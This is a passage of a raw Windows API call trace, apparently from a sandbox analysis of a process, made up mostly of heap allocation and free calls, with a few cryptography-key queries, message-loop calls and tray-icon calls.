Flags=0x0, Size=0x10) returned 0x9ba168 [0158.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0158.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0158.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0158.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0158.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0158.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0158.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0158.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0158.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0158.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0158.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0158.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0158.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0158.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0158.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0158.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0158.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0158.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0158.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0158.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0158.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0158.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0158.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0158.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0158.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0158.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0158.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0158.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0158.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0158.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0158.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0158.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0158.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0158.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.662] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0158.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0158.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0158.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0158.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0158.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0158.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0158.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0158.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0158.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0158.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0158.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0158.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0158.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0158.664] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0158.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0158.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0158.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0158.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0158.664] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0158.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0158.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0158.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0158.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0158.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0158.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0158.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0158.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0158.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0158.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0158.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0158.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0158.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0158.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0158.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0158.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0158.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0158.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0158.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0158.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0158.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0158.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0158.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0158.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0158.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0158.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0158.667] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 1 [0158.667] TranslateMessage (lpMsg=0x87e924) returned 0 [0158.667] DispatchMessageW (lpMsg=0x87e924) returned 0x0 [0158.667] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87dfc0) returned 1 [0158.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0158.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0158.668] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0158.668] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0158.668] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0158.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0158.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0158.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0158.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0158.668] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0158.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0158.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0158.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0158.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0158.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0158.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.669] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0158.669] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0158.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0158.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.670] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.670] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0158.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0158.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0158.670] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.670] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0158.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.670] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0158.670] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0158.670] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.670] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0158.670] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0158.670] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0158.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0158.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0158.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0158.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0158.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0158.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0158.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0158.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.671] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.671] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0158.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0158.672] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 